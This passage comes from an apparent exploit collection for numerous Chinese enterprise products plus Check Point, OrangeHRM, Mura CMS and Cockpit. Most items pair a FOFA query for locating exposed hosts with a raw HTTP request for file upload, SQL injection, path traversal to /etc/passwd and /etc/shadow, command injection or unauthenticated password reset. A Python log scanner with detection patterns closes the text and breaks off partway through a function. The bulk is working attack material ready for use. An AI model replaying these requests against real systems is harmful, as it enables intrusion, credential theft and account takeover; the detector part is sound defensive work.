FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 (HJSOFT) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景 EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system used in photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 setSystemTimeAction command execution
FOFA: body="山石云鉴主机安全管理系统"
Three requests: fetch a CSRF token bound to the PHPSESSID cookie, substitute it for {{token}}, then send the param value, which is handed to a Python interpreter (the payload is an os.system() call). The command writes a marker file under the web root, and the third request reads it back to confirm execution.

GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA: app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the target is vulnerable. The filename field is used without sanitisation, so a ../ sequence places the JSP inside the deployed fe.war:

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA: title=="飞鱼星企业级智能上网行为管理系统"
The name field of the JSON body ends up in a shell command line; the leading ; terminates the intended command and uname -a runs after it:

POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 (unified authentication platform) password reset
FOFA: body="/cas/themes/zbvc/js/jquery.min.js"
The request carries no session cookie or token, so the account named by xgh can be given a new password by anyone who can reach the endpoint:

POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA: app="浙大恩特客户资源管理系统"
UNION-based injection in the goonumStr parameter. Note the ;.js path-parameter suffix on the request line: normalise path parameters before matching this endpoint in logs or WAF rules.

GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV (aliyundrive-webdav LuCI app) command injection
CVE-2024-29640
The sid parameter URL-decodes to `ls />/www/aaa.txt` (shell command substitution), which writes a directory listing under the web root. The request carries a LuCI sysauth session cookie, so the injection is reached through an authenticated admin endpoint.

GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager/upload file upload
FOFA: title="Authenticate Please!"
The upload endpoint only needs a valid session; here the session is obtained with admin/admin. Steps: fetch the CSRF token from the login page, exchange it for a session cookie, upload, then request the stored file.

1. Request the login page to obtain the csfr token:

GET /auth/login?to=/ HTTP/1.1

Response: 200, containing csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from the previous step to obtain a session cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with the session cookie:

POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

Uploaded file path: /storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA: app="海洋CMS"
Time-based injection (MySQL sleep()) in the id parameter of the dmku endpoint; a vulnerable target answers about five seconds late:

GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 (FOUNDER) binary SQL injection
FOFA: body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
The TableName parameter is concatenated into the query. URL-decoded, the payload reads: TableName=DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH (stacked MSSQL statements; a vulnerable target answers about five seconds late).

POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

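The article is meant for defenders doing exposure checks, so here is an added example (written for this page, not part of the original article or any of the products above) that scans web-server access logs for the request paths and payload fragments quoted in items 190 to 201. Endpoint matching normalises dot-segments and ;-path parameters so the /js/../NavigationAjax form of item 191 and the ;.js suffix of item 197 are caught; payload matching runs on the URL-decoded request target so %60 backticks and + spaces do not hide it. The log lines are constructed for the example; only the request targets are the ones quoted above.

```python
import re
from urllib.parse import unquote_plus

# Endpoint paths taken from the requests in items 190-201 above, keyed by
# normalised path. A path hit alone is a weak signal: for the POST-based items
# the payload travels in the body, which an access log does not record.
ENDPOINTS = {
    "/index.php/admin/Userinfo/poihuoqu": "190 poihuoqu file read",
    "/CDGServer3/NavigationAjax": "191 NavigationAjax SQLi",
    "/master/ajaxActions/setSystemTimeAction.php": "193 setSystemTimeAction RCE",
    "/servlet/uploadAttachmentServlet": "194 uploadAttachmentServlet upload",
    "/send_order.cgi": "195 send_order.cgi RCE",
    "/cas/userCtl/resetPasswordBySuper": "196 resetPasswordBySuper",
    "/entsoft/Quotegask_editAction.entweb": "197 Quotegask_editAction SQLi",
    "/cgi-bin/luci/admin/services/aliyundrive-webdav/query": "198 aliyundrive-webdav query",
    "/js/player/dmplayer/dmku/": "200 dmku SQLi",
    "/newsedit/newsplan/task/binary.do": "201 binary.do SQLi",
}

# Payload fragments from the same requests, matched after URL decoding.
PAYLOAD_PATTERNS = [
    (re.compile(r"waitfor\s+delay", re.I), "MSSQL time-based SQLi"),
    (re.compile(r"\bsleep\s*\(", re.I), "MySQL time-based SQLi"),
    (re.compile(r"union\s+(all\s+)?select", re.I), "UNION-based SQLi"),
    (re.compile(r"file://", re.I), "file:// scheme in parameter"),
    (re.compile(r"os\.system\s*\("), "Python os.system() in parameter"),
    (re.compile(r"`[^`]+`"), "backtick command substitution"),
]

# Apache/Nginx combined log format; the request target is one non-space token.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize_path(path):
    """Resolve dot-segments ("/js/../NavigationAjax", item 191) and drop
    path parameters (";.js" in item 197) so the comparison is made on the
    resource the server actually dispatches to."""
    parts = []
    for seg in path.split("/"):
        if seg == "..":
            if parts:
                parts.pop()
        elif seg and seg != ".":
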